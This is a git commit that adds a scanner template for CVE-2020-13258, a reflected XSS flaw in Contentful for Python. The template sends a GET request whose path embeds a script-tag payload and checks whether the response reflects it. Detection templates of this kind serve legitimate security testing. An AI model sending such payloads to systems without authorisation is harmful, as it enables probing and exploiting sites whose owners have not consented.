Create CVE-2020-13258.yaml

patch-1
PikPikcU 2022-01-06 21:49:47 -05:00 committed by GitHub
parent 43f1a6fc4f
commit c3360c9d23
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 20 additions and 0 deletions

View File

@ -0,0 +1,20 @@
id: CVE-2020-13258
info:
name: Contentful reflected XSS
author: pikpikcu
severity: medium
description: Contentful through 2020-05-21 for Python allows reflected XSS.
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-13258
tags: cve,cve2020,contentful,xss
requests:
- method: GET
path:
- '{{BaseURL}}/?cda'"<evil><script>alert(document.domain)</script>&locale=locale=de-DE'
matchers-condition: and
matchers:
- type: word
words:
- "<evil><script>alert(document.domain)</script>"
condition: and